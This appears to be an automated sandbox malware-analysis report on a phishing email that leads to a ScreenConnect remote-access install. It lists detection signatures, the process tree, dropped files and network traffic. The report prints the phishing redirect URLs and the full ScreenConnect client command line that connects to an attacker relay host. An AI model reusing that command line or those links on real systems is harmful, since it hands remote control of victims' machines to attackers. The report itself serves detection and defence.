Edit tour

Windows Analysis Report
phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml

Overview

General Information

Sample name:	phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml
Analysis ID:	1593855
MD5:	845e539d744aa9d873fcc78322e23aab
SHA1:	1a4f474055762a0e8aaed2262e185d0742bcc7e3
SHA256:	7f25bc02b8648f3ed9a3597d965ec56801f2e0a5735498f900e3a517b6294b0e
Infos:

Detection

ScreenConnect Tool

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

AI detected landing page (webpage, office document or email)

AI detected suspicious elements in Email content

Changes security center settings (notifications, updates, antivirus, firewall)

Enables network access during safeboot for specific services

Modifies security policies related information

Possible COM Object hijacking

Reads the Security eventlog

Reads the System eventlog

Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Office Autorun Keys Modification

Stores files to the Windows start menu directory

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Process Tree

System is w10x64_ra

OUTLOOK.EXE (PID: 7096 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml" MD5: 91A5292942864110ED734005B7E005C0)

ai.exe (PID: 880 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D1E851C1-780A-4AD8-8E17-7E00F8FC2E73" "7773720D-9100-489C-95B7-23FC0504D7F1" "7096" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)

chrome.exe (PID: 5860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=5f30d80bfc49ccfd2ec3457f652892e61ef725c0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5364 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

eRemittance.exe (PID: 8004 cmdline: "C:\Users\user\Downloads\eRemittance.exe" MD5: 5A74CB8603DC7543A6CA2B5A91369267)

msiexec.exe (PID: 8080 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)

svchost.exe (PID: 2828 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

SgrmBroker.exe (PID: 6640 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)

svchost.exe (PID: 6692 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6848 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

MpCmdRun.exe (PID: 7924 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)

conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 6096 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

msiexec.exe (PID: 8132 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 8176 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6059364A692FB498A42B140D258E2948 C MD5: 9D09DC1EDA745A5F87553048E57620CF)

rundll32.exe (PID: 2732 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID83C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4839593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)

msiexec.exe (PID: 7592 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D2104C54B219E825B1B95ED4C489F475 MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3684 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F0AA89784B24B42B9C239E4001478082 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)

ScreenConnect.ClientService.exe (PID: 7680 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&c=&c=UPDATE&c=&c=&c=&c=&c=&c=" MD5: 75B21D04C69128A7230A0998086B61AA)

ScreenConnect.WindowsClient.exe (PID: 7852 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d04c094f-179d-486a-be2c-17bfa71a0d2c" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\Downloads\Unconfirmed 376437.crdownload	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\inprogressinstallinfo.ipi	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Config.Msi\49dfbf.rbs	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\MSIE21F.tmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\Downloads\Unconfirmed 376437.crdownload	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\inprogressinstallinfo.ipi	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Config.Msi\49dfbf.rbs	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\MSIE21F.tmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\Downloads\Unconfirmed 376437.crdownload	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\inprogressinstallinfo.ipi	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Config.Msi\49dfbf.rbs	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\MSIE21F.tmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\Downloads\Unconfirmed 376437.crdownload	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\inprogressinstallinfo.ipi	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Config.Msi\49dfbf.rbs	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\MSIE21F.tmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\Downloads\Unconfirmed 376437.crdownload	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 24 entries

Memory Dumps

Source	Rule	Description	Author
0000000D.00000002.1465099103.0000000005680000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000015.00000000.1499986556.0000000000AF2000.00000002.00000001.01000000.00000011.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
0000000D.00000002.1470052005.00000000074D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
0000000D.00000000.1442769522.0000000000936000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
0000000D.00000002.1458252749.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000015.00000002.2498905500.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&c=&c=UPDATE&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&c=&c=UPDATE&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&c=&c=UPDATE&c=&c=&c=&c=&c=&c=", ProcessId: 7680, ProcessName: ScreenConnect.ClientService.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (484f9eed1d8e13b9) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 8132, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-3A73-5AC4396425A8}\(Default)

Sigma detected: Office Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 2828, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Downloads\Unconfirmed 376437.crdownload

ReversingLabs: Detection: 18%

Phishing

AI detected landing page (webpage, office document or email)

Source: Email	Joe Sandbox AI: Page contains button: 'Review Document' Source: 'Email'
Source: Email	Joe Sandbox AI: Email contains prominent button: 'review document'

AI detected suspicious elements in Email content

Source: Email

Joe Sandbox AI: Detected potential phishing email: The email contains multiple suspicious redirect links through clicktime.cloud.postoffice.net pointing to potentially malicious domains. The subject line and content follow common phishing patterns mentioning 'remittance' and 'eDocument' to create urgency. The sender's domain doesn't match the service desk contact information and social media links included in the footer

Source: Email

Classification: Invoice Scam

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49730 version: TLS 1.2

Source: C:\Windows\System32\msiexec.exe	File opened: z:
Source: C:\Windows\System32\msiexec.exe	File opened: x:
Source: C:\Windows\System32\msiexec.exe	File opened: v:
Source: C:\Windows\System32\msiexec.exe	File opened: t:
Source: C:\Windows\System32\msiexec.exe	File opened: r:
Source: C:\Windows\System32\msiexec.exe	File opened: p:
Source: C:\Windows\System32\msiexec.exe	File opened: n:
Source: C:\Windows\System32\msiexec.exe	File opened: l:
Source: C:\Windows\System32\msiexec.exe	File opened: j:
Source: C:\Windows\System32\msiexec.exe	File opened: h:
Source: C:\Windows\System32\msiexec.exe	File opened: f:
Source: C:\Windows\System32\svchost.exe	File opened: d:
Source: C:\Windows\System32\msiexec.exe	File opened: b:
Source: C:\Windows\System32\msiexec.exe	File opened: y:
Source: C:\Windows\System32\msiexec.exe	File opened: w:
Source: C:\Windows\System32\msiexec.exe	File opened: u:
Source: C:\Windows\System32\msiexec.exe	File opened: s:
Source: C:\Windows\System32\msiexec.exe	File opened: q:
Source: C:\Windows\System32\msiexec.exe	File opened: o:
Source: C:\Windows\System32\msiexec.exe	File opened: m:
Source: C:\Windows\System32\msiexec.exe	File opened: k:
Source: C:\Windows\System32\msiexec.exe	File opened: i:
Source: C:\Windows\System32\msiexec.exe	File opened: g:
Source: C:\Windows\System32\msiexec.exe	File opened: e:
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 31MB

Networking

Enables network access during safeboot for specific services

Source: C:\Windows\System32\msiexec.exe

Registry value created: NULL Service

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.14
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56

Source: global traffic	DNS traffic detected: DNS query: clicktime.cloud.postoffice.net
Source: global traffic	DNS traffic detected: DNS query: fub.direct
Source: global traffic	DNS traffic detected: DNS query: bahraincv.com
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: slplegalfinance.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49730 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
